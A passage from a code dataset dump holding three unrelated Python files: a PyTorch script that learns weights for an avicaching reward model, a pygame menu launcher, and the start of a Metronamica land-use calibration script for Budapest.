help=\"hides the loss plot, which is only saved\")\nparser.add_argument(\"--hide-map-plot\", action=\"store_true\", default=False,\n help=\"hides the map plot, which is only saved\")\nparser.add_argument(\"--log-interval\", type=int, default=1, metavar=\"I\",\n help=\"prints training information at I epoch intervals (default=1)\")\n# deprecated options -- not deleting if one chooses to use them\nparser.add_argument(\"--expand-R\", action=\"store_true\", default=False,\n help=\"[see script] expands the reward vectors into matrices with distributed rewards\")\nparser.add_argument(\"--eta\", type=float, default=10.0, metavar=\"F\",\n help=\"[see script] inputs parameter eta in the model (default=10.0)\")\nparser.add_argument(\"--lambda-L1\", type=float, default=10.0, metavar=\"LAM\",\n help=\"[see script] inputs the L1 regularizing coefficient\")\nparser.add_argument(\"--momentum\", type=float, default=1.0, metavar=\"M\",\n help=\"[see script] inputs SGD momentum (default=1.0)\") # if using SGD\n\nargs = parser.parse_args()\n# assigning cuda check and test check to single variables\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\nargs.should_test = (args.train_percent != 1.0)\n\n# set the seeds\ntorch.manual_seed(args.seed)\nnp.random.seed(seed=args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n# =============================================================================\n# constants and parameters\n# =============================================================================\n# global values and datasets\ntorchten = torch.FloatTensor # change here to use diff containers\nJ, T, numFeatures = args.locations, args.time, 0\ntrainX, trainY, trainR, testX, testY, testR, F_DIST = [], [], [], [], [], [], []\nu_train, u_test = np.array([]), np.array([])\n\nnum_train = int(math.floor(args.train_percent * T))\nnum_test = T - num_train\n\n# random datasets locations assigned to variables\nlocs_in_file = 232 # change this to use a diff random file\nrandXYR_file = \"./data/random/randXYR\" + str(locs_in_file) + \".txt\"\nrandXYR_weights_file = \"./data/random/randXYR\" + str(locs_in_file) + \"_weights.txt\"\nrandF_file = \"./data/random/randF\" + str(locs_in_file) + \".csv\"\nrandDIST_file = \"./data/random/randDIST\" + str(locs_in_file) + \".txt\"\n\n# =============================================================================\n# data input functions\n# =============================================================================\ndef read_set_data():\n \"\"\"\n Reads Datasets X, Y, R, f, D from the files using avicaching_data \n module's functions. f and D are then combined into F_DIST as preprocessed \n tensor. 
All datasets are normalized, expanded, averaged as required, \n leaving as torch tensors at the end of the function.\n \"\"\"\n global trainX, trainY, trainR, testX, testY, testR, F_DIST, numFeatures\n global u_train, u_test\n # shapes of datasets -- [] means expanded form:\n # - X, Y: T x J\n # - R: T x J [x 15]\n # - net.w1: J x numF x numF\n # - net.w2: J x numF x 1\n # - F_DIST: J x J x numF\n\n # read f and DIST datasets from file, operate on them\n if args.rand:\n F = ad.read_F_file(randF_file, J)\n DIST = ad.read_dist_file(randDIST_file, J)\n else:\n F = ad.read_F_file(\n \"./data/loc_feature_with_avicaching_combined.csv\", J)\n DIST = ad.read_dist_file(\n \"./data/site_distances_km_drastic_price_histlong_0327_0813_combined.txt\", \n J)\n F = ad.normalize(F, along_dim=0, using_max=True) # normalize using max\n DIST = ad.normalize(DIST, using_max=True) # normalize using max\n\n # process data for the NN\n numFeatures = len(F[0]) + 1 # compensating for the distance element\n F_DIST = torchten(ad.combine_DIST_F(F, DIST, J, numFeatures))\n numFeatures += 1 # for reward later\n\n # operate on XYR data\n X, Y, R = [], [], []\n if args.rand:\n if not os.path.isfile(randXYR_file):\n # file doesn't exists, make random data, write to file\n X, Y, R = make_rand_data()\n ad.save_rand_XYR(randXYR_file, X, Y, R, J, T)\n X, Y, R = ad.read_XYR_file(randXYR_file, J, T)\n else:\n X, Y, R = ad.read_XYR_file(\n \"./data/density_shift_histlong_as_previous_loc_classical_drastic_price_0327_0813.txt\", \n J, T)\n \n u = np.sum(Y, axis=1) # u weights for calculating losses\n\n # normalize X, Y using sum along rows\n X = ad.normalize(X, along_dim=1, using_max=False)\n Y = ad.normalize(Y, along_dim=1, using_max=False)\n if not args.expand_R:\n R = ad.normalize(R, along_dim=0, using_max=False)\n\n # split the XYR data\n if args.should_test:\n # training and testing, shuffle and split the data\n shuffle_order = np.random.permutation(T)\n trainX, testX = ad.split_along_dim(X[shuffle_order], num_train, dim=0)\n trainY, testY = ad.split_along_dim(Y[shuffle_order], num_train, dim=0)\n trainR, testR = ad.split_along_dim(R[shuffle_order], num_train, dim=0)\n u_train, u_test = ad.split_along_dim(u[shuffle_order], num_train, dim=0)\n else:\n # no testing, split the data -> test Matrices are empty\n trainX, testX = ad.split_along_dim(X, num_train, dim=0)\n trainY, testY = ad.split_along_dim(Y, num_train, dim=0)\n trainR, testR = ad.split_along_dim(R, num_train, dim=0)\n u_train, u_test = ad.split_along_dim(u, num_train, dim=0)\n\n # change the input data into pytorch tensors and variables\n trainR, testR = torchten(trainR), torchten(testR)\n u_train, u_test = torchten(u_train), torchten(u_test)\n trainX = Variable(torchten(trainX), requires_grad=False)\n trainY = Variable(torchten(trainY), requires_grad=False)\n testX = Variable(torchten(testX), requires_grad=False)\n testY = Variable(torchten(testY), requires_grad=False)\n\n if args.expand_R:\n # expand R (trainR and testR)\n trainR_ext = torchten(num_train, J, 15)\n testR_ext = torchten(num_test, J, 15)\n for t in xrange(num_train):\n trainR_ext[t] = expand_R(trainR[t], R_max=15)\n for t in xrange(num_test):\n testR_ext[t] = expand_R(testR[t], R_max=15)\n trainR, testR = trainR_ext, testR_ext\n numFeatures += 14 # 1 reward already added, adding the remaining 14\n\ndef make_rand_data(X_max=100.0, R_max=100.0):\n \"\"\"\n Creates random X and R and calculates Y based on random weights. 
Also \n stores the weights in files before returning.\n\n Args:\n X_max -- (float) Maximum value of element in X dataset (default=100.0)\n R_max -- (float) Maximum value of element in R dataset (default=100.0)\n\n Returns:\n 3-tuple -- (X, Y, R) (values are not de-normalized)\n \"\"\"\n global F_DIST\n # create random X and R and w\n origX = np.floor(np.random.rand(T, J) * X_max)\n origR = np.floor(np.random.rand(T, J) * R_max)\n X = ad.normalize(origX, along_dim=1, using_max=False)\n R = torchten(ad.normalize(origR, along_dim=0, using_max=False))\n w1 = Variable(torch.randn(J, numFeatures, numFeatures).type(torchten))\n w2 = Variable(torch.randn(J, numFeatures, 1).type(torchten))\n\n # convert to torch tensor and create placeholder for Y\n Y = np.empty([T, J])\n X = Variable(torchten(X), requires_grad=False)\n Y = Variable(torchten(Y), requires_grad=False)\n if args.cuda:\n # transfer to GPU\n X, Y, R, F_DIST = X.cuda(), Y.cuda(), R.cuda(), F_DIST.cuda()\n w1, w2 = w1.cuda(), w2.cuda()\n \n # build Y\n for t in xrange(T):\n # build the input by appending testR[t]\n inp = build_input(R[t])\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n inp = torchfun.relu(torch.bmm(inp, w1)) # first weights\n inp = torch.bmm(inp, w2).view(-1, J) # second weights\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n P = torchfun.softmax(inp).t()\n \n # calculate Y\n Y[t] = torch.mv(P, X[t])\n\n # for verification of random data, save weights ---------------------------\n w1_matrix = w1.data.cpu().numpy()\n w2_matrix = w2.data.view(-1, numFeatures).cpu().numpy()\n\n with open(randXYR_weights_file, \"w\") as f:\n # save w1\n f.write('# w1 shape: {0}\\n'.format(w1.data.shape))\n for data_slice in w1_matrix:\n f.write('# New slice\\n')\n np.savetxt(f, data_slice, fmt=\"%.15f\", delimiter=\" \")\n \n # save w2\n f.write('# w2 shape: {0}\\n'.format(w2.data.shape))\n np.savetxt(f, w2_matrix, fmt=\"%.15f\", delimiter=\" \")\n # -------------------------------------------------------------------------\n\n return (X.data.cpu().numpy(), Y.data.cpu().numpy(), R.cpu().numpy())\n\ndef test_given_data(X, Y, R, w1, w2, J, T, u):\n \"\"\"\n Tests a given set of datasets, printing the loss value after one \n forward propagation.\n\n Args:\n All arguments are self-explanatory\n \"\"\"\n # loss_normalizer divides the calculated loss after feed forward\n # formula = || ((u * (Y-mean(Y)))^2 ||\n loss_normalizer = (torch.mv(torch.t(Y \\\n - torch.mean(Y).expand_as(Y)).data, u)).pow(2).sum()\n loss = 0\n\n for t in xrange(T):\n # build the input by appending testR[t]\n inp = build_input(R[t])\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n inp = torchfun.relu(torch.bmm(inp, w1)) # first weights\n inp = torch.bmm(inp, w2).view(-1, J) # second weights\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n P = torchfun.softmax(inp).t()\n \n # calculate loss\n Pxt = torch.mv(P, X[t])\n loss += (u[t] * (Y[t] - Pxt)).pow(2).sum()\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n loss /= loss_normalizer\n print(\"Loss = %f\\n\" % loss.data[0], end=\"\")\n\n# =============================================================================\n# IdProb3 class\n# =============================================================================\nclass IdProb3(nn.Module):\n 
\"\"\"\n An instance of this class emulates the model used for Identification \n Problem as a 3-layered network.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializes IdProb3, creates the sets of weights for the model.\"\"\"\n super(IdProb3, self).__init__()\n self.w1 = nn.Parameter(torch.randn(J, numFeatures, numFeatures).type(\n torchten))\n self.w2 = nn.Parameter(torch.randn(J, numFeatures, 1).type(torchten))\n\n def forward(self, inp):\n \"\"\"\n Goes forward in the network -- multiply the weights, apply relu, \n multiply weights again and apply softmax\n\n Returns:\n torch.Tensor -- result after going forward in the network.\n \"\"\"\n inp = torchfun.relu(torch.bmm(inp, self.w1)) # first weights\n inp = torch.bmm(inp, self.w2).view(-1, J) # second weights\n\n # add eta to inp[u][u]\n # eta_matrix = Variable(eta * torch.eye(J).type(torchten))\n # if args.cuda:\n # \t eta_matrix = eta_matrix.cuda()\n # inp += eta_matrix\n return torchfun.softmax(inp)\n\n# =============================================================================\n# training and testing routines\n# =============================================================================\ndef train(net, optimizer, loss_normalizer, u):\n \"\"\"\n Trains the Neural Network using IdProb3 on the training set.\n\n Args:\n net -- (IdProb3 instance)\n optimizer -- (torch.optim instance) of the Gradient-Descent function\n loss_normalizer -- (Torch.Tensor) value to be divided from the loss\n u -- (Torch.Tensor) weights to be multiplied when calculating the loss \n function\n\n Returns:\n 3-tuple -- (Execution Time, End loss value, \n Model's prediction after feed forward [Px])\n \"\"\"\n loss, loop_time = 0, 0\n P_data = torch.zeros(num_train, J)\n\n for t in xrange(num_train):\n # build the input by appending trainR[t] to F_DIST\n inp = build_input(trainR[t])\n \n loop_start = time.time()\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n P = net(inp).t() # P is now weighted -> softmax\n \n # calculate loss\n Pxt = torch.mv(P, trainX[t])\n P_data[t] = Pxt.data\n loss += (u[t] * (trainY[t] - Pxt)).pow(2).sum()\n \n loop_time += (time.time() - loop_start)\n\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n start_outside = time.time()\n loss /= loss_normalizer\n\n # backpropagate\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n end_time = (time.time() - start_outside) + loop_time\n return (end_time, loss.data[0], \n torch.mean(P_data, dim=0).squeeze().cpu().numpy())\n\ndef test(net, loss_normalizer, u):\n \"\"\"\n Tests the Neural Network using IdProb3 on the test set.\n\n Args:\n net -- (IdProb3 instance)\n loss_normalizer -- (Torch.Tensor) value to be divided from the loss\n u -- (Torch.Tensor) weights to be multiplied when calculating the loss \n function\n\n Returns:\n 3-tuple -- (Execution Time, End loss value, \n Model's prediction after feed forward [Px])\n \"\"\"\n loss, loop_time = 0, 0\n P_data = torch.zeros(num_test, J)\n \n for t in xrange(num_test):\n # build the input by appending testR[t]\n inp = build_input(testR[t])\n \n loop_start = time.time()\n if args.cuda:\n inp = inp.cuda()\n inp = Variable(inp)\n \n # feed in data\n P = net(inp).t() # P is now weighted -> softmax\n \n # calculate loss\n Pxt = torch.mv(P, testX[t])\n P_data[t] = Pxt.data\n loss += (u[t] * (testY[t] - Pxt)).pow(2).sum()\n\n loop_time += (time.time() - loop_start)\n\n # loss += args.lambda_L1 * torch.norm(net.w.data)\n start_outside = time.time()\n loss /= loss_normalizer\n\n end_time = (time.time() - 
start_outside) + loop_time\n return (end_time, loss.data[0], \n torch.mean(P_data, dim=0).squeeze().cpu().numpy())\n\n# =============================================================================\n# utility functions for training and testing routines\n# =============================================================================\ndef build_input(rt):\n \"\"\"\n Builds and returns the input for the neural network. Joins F_DIST and R, \n expanding R to fit the dimension.\n\n Args:\n rt -- (Torch.Tensor) rewards vector to be appended to form the full \n dataset\n \n Returns:\n Torch.Tensor -- Input dataset for the neural network\n \"\"\"\n if args.expand_R:\n # supplied rt is a matrix\n return torch.cat([F_DIST, rt.repeat(J, 1, 1)], dim=2)\n # else supplied rt is a vector\n return torch.cat([F_DIST, rt.repeat(J, 1)], dim=2)\n\n# =============================================================================\n# logs and plots\n# =============================================================================\ndef save_plot(file_name, x, y, xlabel, ylabel, title):\n \"\"\"\n Saves and (optionally) shows the loss plot of train and test periods.\n\n Args:\n file_name -- (str) name of the file for saving\n x -- (NumPy ndarray) data on the x-axis\n y -- (3d array/tuple) data on the y-axis. y[0] should be \n train results, y[1] should be test results obtained from the \n functions. y[-][k] should be the results after the k+1 epoch \n such that y[-][k][0] is the execution time and y[-][k][1] is the \n end loss. See the main area of the script on how this is built.\n xlabel -- (str) label for the x-axis\n ylabel -- (str) what else can it mean?\n title -- (str) title of the plot\n \"\"\"\n # get the loss values from data\n train_losses = [i for j in y[0] for i in j][1::2]\n test_losses = [i for j in y[1] for i in j][1::2]\n \n # plot details\n loss_fig = plt.figure(1)\n train_label, = plt.plot(x, train_losses, \"r-\", label=\"Train Loss\") \n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.grid(True, which=\"major\", axis=\"both\", color=\"k\", ls=\"dotted\", lw=\"1.0\")\n plt.grid(True, which=\"minor\", axis=\"y\", color=\"k\", ls=\"dotted\", lw=\"0.5\")\n plt.minorticks_on()\n plt.title(title)\n\n # check if testing was enabled\n if args.should_test:\n test_label, = plt.plot(x, test_losses, \"b-\", label=\"Test Loss\")\n plt.legend(handles=[train_label, test_label])\n else:\n plt.legend(handles=[train_label])\n \n # save and show\n loss_fig.savefig(file_name, bbox_inches=\"tight\", dpi=200)\n if not args.hide_loss_plot:\n plt.show()\n plt.close()\n\ndef save_log(file_name, x, y, title):\n \"\"\"\n Saves the log of train and test periods to a file.\n\n Args:\n file_name -- (str) name of the file\n x -- (NumPy ndarray) epoch data [1..number_of_epochs]\n y -- (3d array/tuple) same as that of save_plot()\n title -- (str) first line of the file\n \"\"\"\n with open(file_name, \"wt\") as f:\n f.write(title + \"\\n\")\n f.write(\"J: %3d\\t\\tT: %3d\\n-------------\\n\" % (J, T))\n for i in range(0, len(x), args.log_interval):\n # write data at log_intervals\n f.write(\"epoch = %d\\t\\ttrainloss = %.4f, traintime = %.4f\" % (\n x[i], y[0][i][1], y[0][i][0]))\n if args.should_test:\n f.write(\"\\t\\ttestloss = %.4f, testtime = %.4f\" % (\n y[1][i][1], y[1][i][0]))\n f.write(\"\\n\")\n\ndef find_idx_of_nearest_el(array, value):\n \"\"\"\n Helper function to plot_predicted_map(). 
Returns the index of the element in\n array closest to value\n\n Args:\n array -- (NumPy ndarray) array to be searched in\n value -- (float) closest number in array found for this number\n\n Returns:\n int -- index of the closest number to value in array\n \"\"\"\n return (np.abs(array - value)).argmin()\n\ndef plot_predicted_map(file_name, lat_long, point_info, title, plot_offset=0.05):\n \"\"\"\n Plots the a scatter plot of point_info on the map specified by the latitudes\n and longitudes and saves the plot to a image file\n\n Args:\n file_name -- (str) file name of the plot\n lat_long -- (NumPy ndarray) 2-d matrix of latitudes and longitudes of \n locations. The first column contains latitudes, and the second \n column contains longitudes.\n point_info -- (NumPy ndarray) Z values for all locations. The order of \n locations must be same as the order in lat_long\n title -- (str) title of the plot\n plot_offset -- (float) padding value for latitude and longitude in the \n plot (default=0.05)\n \"\"\"\n # extract latitude and longitude\n lati = lat_long[:,0]\n longi = lat_long[:,1]\n # calculate plot dimensions - select between latitude/longitude based on \n # their span over earth. The greater span is the basis\n lo_min, lo_max = min(longi) - plot_offset, max(longi) + plot_offset\n la_min, la_max = min(lati) - plot_offset, max(lati) + plot_offset\n plot_width = max(lo_max - lo_min, la_max - la_min)\n lo_max = lo_min + plot_width\n la_max = la_min + plot_width\n\n # create the mesh for pcolormesh, see its documentation\n # retained step for convenience in testing\n # J+10 values needed on each side, this can lead to rectangular dots\n lo_range = np.linspace(lo_min, lo_max, num=J+10, retstep=True)\n la_range = np.linspace(la_min, la_max, num=J+10, retstep=True)\n lo, la = np.meshgrid(lo_range[0], la_range[0])\n\n z = np.zeros([J + 10, J + 10])\n for k in xrange(J):\n # for each location in latitude and longitude array, find the closest\n # value in the mesh, i.e., lati[k] in the mesh, longi[k] in the mesh\n lo_k_mesh = find_idx_of_nearest_el(lo[0], longi[k])\n la_k_mesh = find_idx_of_nearest_el(la[:, 0], lati[k])\n z[lo_k_mesh][la_k_mesh] = point_info[k] # assign Z value in the matrix\n\n map_fig = plt.figure(2)\n plt.pcolormesh(lo, la, z, cmap=plt.cm.get_cmap('Greys'), vmin=0.0, vmax=0.01)\n plt.axis([lo.min(), lo.max(), la.min(), la.max()])\n plt.colorbar()\n plt.title(title)\n map_fig.savefig(file_name, bbox_inches=\"tight\", dpi=200)\n if not args.hide_map_plot:\n plt.show()\n plt.close()\n\n# =============================================================================\n# misc utility functions\n# =============================================================================\ndef expand_R(rt, R_max=15):\n \"\"\"\n Expands rt into a matrix with each rt[u] having R_max number of elements,\n where the first rt[u] elements are 1's and rest 0's. So if rt[u] is 7 and \n R_max is 15, rt[u] becomes [1 1 1 1 1 1 1 0 0 0 0 0 0 0 0].\n\n Args:\n rt -- (Torch.Tensor) vector of rewards\n R_max -- (int) Number of elements for expansion (default=15). When using \n orig data, R_max must be greater than 15. 
It's also the max reward in \n the rewards file\n\n Returns:\n Torch.Tensor -- Expanded R of size J x R_max\n \"\"\"\n newrt = torchten(J, R_max)\n if args.cuda:\n newrt = newrt.cuda()\n for u in xrange(J):\n r = int(rt[u])\n newrt[u] = torch.cat([torch.ones(r), torch.zeros(R_max - r)], dim=0)\n return newrt\n\n# =============================================================================\n# main program\n# =============================================================================\nif __name__ == \"__main__\":\n # READY!!\n read_set_data()\n net = IdProb3()\n # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=args.momentum)\n optimizer = optim.Adam(net.parameters(), lr=args.lr)\n\n # SET!!\n transfer_time = time.time()\n if args.cuda:\n # transfer tensors to the gpu\n net.cuda()\n trainX, trainY, trainR = trainX.cuda(), trainY.cuda(), trainR.cuda()\n testX, testY, testR = testX.cuda(), testY.cuda(), testR.cuda()\n F_DIST = F_DIST.cuda()\n u_train, u_test = u_train.cuda(), u_test.cuda()\n file_pre_gpu = \"gpu, \"\n else:\n file_pre_gpu = \"cpu, \"\n transfer_time = time.time() - transfer_time\n if args.expand_R:\n file_pre_gpu = \"expandedR, \" + file_pre_gpu\n\n # scalar + tensor not supported in pytorch v0.12.2\n # formula = (u(Y-mean(Y)))^2\n train_loss_normalizer = (torch.mv(torch.t(trainY \\\n - torch.mean(trainY).expand_as(trainY)).data, u_train)).pow(2).sum()\n if args.should_test:\n test_loss_normalizer = (torch.mv(torch.t(testY \\\n - torch.mean(testY).expand_as(testY)).data, u_test)).pow(2).sum()\n \n # GO!!\n train_time_loss, test_time_loss, total_time = [], [], transfer_time\n for e in xrange(1, args.epochs + 1):\n # train\n train_res = train(net, optimizer, train_loss_normalizer, u_train)\n train_time_loss.append(train_res[0:2]) # the third element is not logged\n total_time += (train_res[0])\n\n # print results, some quirky arguments to print for nice console printing\n if e % 20 == 0:\n print(\"e= %2d, loss=%.8f\" % (e, train_res[1]), end=\"\")\n\n if args.should_test:\n # test\n test_res = test(net, test_loss_normalizer, u_test)\n test_time_loss.append(test_res[0:2])\n total_time += test_res[0]\n if e % 20 == 0:\n print(\", testloss=%.8f\\n\" % (test_res[1]), end=\"\")\n else:\n print(\"\\n\", end=\"\")\n\n if e == args.epochs:\n # Network's final prediction\n y_pred = test_res[2] if args.should_test else train_res[2]\n \n # FINISH!!\n # log and plot the results: epoch vs loss\n\n # define file names\n if args.rand:\n file_pre = \"randXYR_seed=%d, epochs=%d, \" % (args.seed, args.epochs)\n lat_long = ad.read_lat_long_from_Ffile(randF_file, J)\n else:\n file_pre = \"origXYR_seed=%d, epochs=%d, \" % (args.seed, args.epochs)\n lat_long = ad.read_lat_long_from_Ffile(\n \"./data/loc_feature_with_avicaching_combined.csv\", J)\n log_name = \"train=%3.0f%%, lr=%.3e, time=%.4f sec\" % (\n args.train_percent * 100, args.lr, total_time)\n epoch_data = np.arange(1, args.epochs + 1)\n fname = file_pre_gpu + file_pre + log_name\n # save amd plot data\n save_log(\n \"./stats/find_weights/logs/\" + fname + \".txt\", epoch_data, \n [train_time_loss, test_time_loss], log_name)\n with open(\"./stats/find_weights/weights/\" + fname + \".txt\", \"w\") as f:\n # save w1\n w1 = net.w1.data.cpu().numpy()\n f.write('# w1 shape: {0}\\n'.format(w1.shape))\n for data_slice in w1:\n f.write('# New slice\\n')\n np.savetxt(f, data_slice, fmt=\"%.15f\", delimiter=\" \")\n \n # save w2\n w2 = net.w2.data.view(-1, numFeatures).cpu().numpy()\n f.write('# w2 shape: {0}\\n'.format(w2.shape))\n 
np.savetxt(f, w2, fmt=\"%.15f\", delimiter=\" \")\n if not args.no_plots:\n # should plot\n save_plot(\n \"./stats/find_weights/plots/\" + fname + \".png\", epoch_data, \n [train_time_loss, test_time_loss], \"epoch\", \"loss\", log_name)\n plot_predicted_map(\n \"./stats/find_weights/map_plots/\" + fname + \".png\", \n lat_long, y_pred, log_name)\n \n print(\"---> \" + fname + \" DONE\")\n","sub_path":"nnAvicaching_find_weights.py","file_name":"nnAvicaching_find_weights.py","file_ext":"py","file_size_in_byte":28902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521973872","text":"# JLM coursework\n# This will hopefully be the main file which launches the executable\n\n# Import statements ------\nimport pygame\nimport Toolbox\nimport Menus\n\n\npygame.init()\n# ------\n# Pygame Setup ------ THIS SHOULD ALL BE TURNED INTO ONE CLASS WITH THE SETTINGS LOAD, THIS WOULD THEN SUPERCLASS\n# ALL OF THE MENUS ETC EACH SHOULDN'T NEED A CONSTRUCTOR JUST A LOADER THEN RUNNER AND UNLOADER?\ngame = Toolbox.Game(\"Settings.txt\")\n\n# These create the objects for each screen\nmain_menu = Menus.MainMenu(30, game)\noptions_menu = Menus.OptionsMenu(30, game)\nplay_menu = Menus.PlayMenu(30, game)\nmap_creator_menu = Menus.MapMakerMenu(30, game)\n\n# This is being used to allow each object access to the menu objects, This could be changed for just accessing them\n# from the launcher\nmenus = [main_menu, options_menu, play_menu, map_creator_menu]\n\n# This adds the list of menus to the objects\nmain_menu.add_windows(menus)\noptions_menu.add_windows(menus)\nplay_menu.add_windows(menus)\nmap_creator_menu.add_windows(menus)\n\n# Loads each screen for the menu, this ensures they are always ready\nmain_menu.load_assets()\noptions_menu.load_assets()\nplay_menu.load_assets()\nmap_creator_menu.load_assets()\n\n\n# Starts the application by running main window\nmain_menu.run_window()\n","sub_path":"Launcher.py","file_name":"Launcher.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"559820814","text":"\"\"\"\nThis component of the Empirical Neighbourhood Calibration method conducts the\nenumeration analysis of the meta-parameters used to initialise the\ncalibration method.\n\"\"\"\n\nimport numpy as np\nfrom considered_distances import considered_distances\nfrom read_map import read_map\nfrom enrichment_factor import ef\nfrom log_scale_ef import log_scale_ef\nfrom contingency_table import contingency_table\nfrom set_NR import set_lp_rule\nfrom set_rand import set_rand\nfrom run_metro import run_metro\nfrom kappa import ksim\nfrom area_weighted_clu import area_weighted_clu_error\nimport csv\n\n# Specify the base path to the directory containing the empirical neighbourhood\n# calibration tool-pack.\nbase_path = \"C:\\\\Users\\\\charl\\\\OneDrive\\\\Documents\\\\ENC\\\\\"\n# Specify the case study.\ncase_study = \"Budapest\"\n# Set the paths to the directories and relevant data\ndata_path = base_path + \"Example_case_study_data\\\\\"\noutput_path = base_path + \"Example_case_study_output\\\\\"\nmap1_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_1990.asc\"\nmap2_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_2000.asc\"\nmask_path = data_path + case_study + \"\\\\\" + case_study.lower() + \"_mask.asc\"\n# Specify the working directory (location of project file) and project file.\nworking_directory = 
(\"C:\\\\Geonamica\\\\Metronamica\\\\\"\n + case_study + \"\\\\\")\nproject_file = working_directory + case_study + \".geoproj\"\n# Specify the paths to the simulated output maps.\nsmap_path = (\"C:\\\\Geonamica\\\\Metronamica\\\\\"\n + case_study + \"\\\\Log\\\\Land_use\\\\\"\n \"Land use map_2000-Jan-01 00_00_00.rst\")\n# Read in the data maps and mask.\nomap = read_map(map1_path)\namap = read_map(map2_path)\nmask = read_map(mask_path)\n# Analyse the input maps for evaluation purposes\nmap_dimensions = np.shape(omap)\nrows = map_dimensions[0]\ncols = map_dimensions[1]\n# Specify the command line version of Geonamica.\ngeo_cmd = \"C:\\\\Program Files (x86)\\\\Geonamica\\\\Metronamica\\\\GeonamicaCmd.exe\"\n# Specify the log file path.\nlog_file = base_path + \"LogSettings.xml\"\n\n# Set the land-use class names.\nluc_names = [\"Natural areas\", \"Arable land\", \"Permanent crops\", \"Pastures\",\n \"Agricultural areas\", \"Residential\", \"Industry & commerce\",\n \"Recreation areas\", \"Forest\", \"Road & rail\", \"Seaports\",\n \"Airports\", \"Mine & dump sites\", \"Fresh water\", \"Marine water\"]\n# Set the land-use class parameters: number of land-use classes, passive,\n# feature, and active.\nluc = len(luc_names)\npas = 1\nfea = 6\nact = luc - (pas + fea)\n\n# Count the presence of each land-use class in the actual map. This is\n# used in the calculation of area-weighted average clumpiness across the\n# active classes.\nluc_count = [0] * luc\nfor i in range(0, rows):\n for j in range(0, cols):\n if mask[i, j] > 0:\n luc_count[amap[i, j]] = luc_count[amap[i, j]] + 1\n# Specify the maximum neighbourhood size distance considered\nmax_distance = 5\n# Determine the distances that will be analysed, use module: considered_distances.\ntemp = considered_distances(max_distance)\n# Store the list of considered distances as a variable.\ncd = temp[0]\n# Store the total number of distances considered\ncdl = temp[1]\n# Determine the maximum neighbourhood size (unit) from considered distances\nN_all = [1, 8, 12, 16, 32, 28, 40, 40, 20]\nN = []\nfor c in range(0, max_distance):\n N.append(N_all[c])\n\n# Specify the meta-analysis calibration method parameters: the base random\n# seed, and the maximum number of simulation runs.\nmax_runs = 10\nbase_seed = 1000\n\n# Specify the bands levels.\n# The inertia band levels, for setting inertia values.\nhigh_inertia_band = 0.95\nmid_inertia_band = 0.90\n# The conversion band levels, for setting conversion values.\nhigh_conversion_band = 0.5\nmid_conversion_band = 0.1\nlow_conversion_band = 0.025\n# The enrichment factor band levels, for setting the tail values.\nhigh_ef = 1.0\nmid_ef = 0.5\n\n# Specify high, medium and low inertia values.\n# The default settings are a high inertia of 1000, med 500, low 250.\nhigh_inertia = 1000.0\nmid_inertia = 500.0\nlow_inertia = 250.0\n\n\"\"\"***Change the values here ***\"\"\"\n# Set default meta-parameters.\n# Self-influence tail, specified at a distance of 1\ntheta_si1 = 0.025\ntheta_si2 = theta_si1*0.1\n# Conversion point.\ntheta_cp = 0.045\n# Interaction tail, specified at a distance of 1\ntheta_ct1 = 0.005\ntheta_ct2 = theta_ct1*0.1\n\n# Calculate all relevant neighbourhood rule parameter values.\n# Set the conversion parameter values.\nhigh_conversion = high_inertia * theta_cp\nmid_conversion = mid_inertia * theta_cp\nlow_conversion = low_inertia * theta_cp\n# Set the distance 1 tail values for self-influence rules.\nd1_high_si_value = high_inertia * theta_si1\nd1_mid_si_value = mid_inertia * 
theta_si1\nd1_low_si_value = low_inertia * theta_si1\n# Set the distance 2 tail values for self-influence rules.\nd2_high_si_value = high_inertia * theta_si2\nd2_mid_si_value = mid_inertia * theta_si2\nd2_low_si_value = low_inertia * theta_si2\n# Set the distance 1 tail values for interaction rules.\nd1_high_co_value = high_inertia * theta_ct1\nd1_mid_co_value = mid_inertia * theta_ct1\nd1_low_co_value = low_inertia * theta_ct1\n# Set the distance 2 tail value for interaction rules.\nd2_high_co_value = high_inertia * theta_ct2\nd2_mid_co_value = mid_inertia * theta_ct2\nd2_low_co_value = low_inertia * theta_ct2\n\n# Generate the Enrichment Factor and contingency table.\ndata_ef = ef(luc, max_distance, cdl, cd, N, omap, amap, mask, rows, cols)\n# Log scale the enrichment factor values.\nlog_data_ef = log_scale_ef(data_ef, 10, luc, act, pas, max_distance)\n# Generate the contingency table using the module, 'contingency_table'\ncont_table = contingency_table(omap, amap, mask, luc, rows, cols)\n# Evaluate the rates of inertia and conversion\nic_rates = np.zeros(shape=(luc, luc))\nfor i in range(0, luc):\n for j in range(0, luc):\n if i == j:\n if cont_table[i, luc] > 0:\n ic_rates[i, j] = cont_table[i, j] / cont_table[i, luc]\n else:\n conversions = abs(float(cont_table[j, j]) - float(cont_table[luc, j]))\n if conversions > 0:\n ic_rates[i, j] = float(cont_table[i, j]) / float(conversions)\n# Load the attraction rules file\natt_rule_file = output_path + case_study + \"\\\\Rules\\\\att_rules.txt\"\natt_rules = np.loadtxt(att_rule_file)\n# Input the rules to be analysed. Start by initialising a dictionary for\n# storage.\nrules = {}\nfor i in range(0, act):\n for j in range(0, luc):\n key = \"from \" + luc_names[j] + \" to \" + luc_names[i + pas]\n rules[key] = [0, 0, 0, 5]\n# Set the 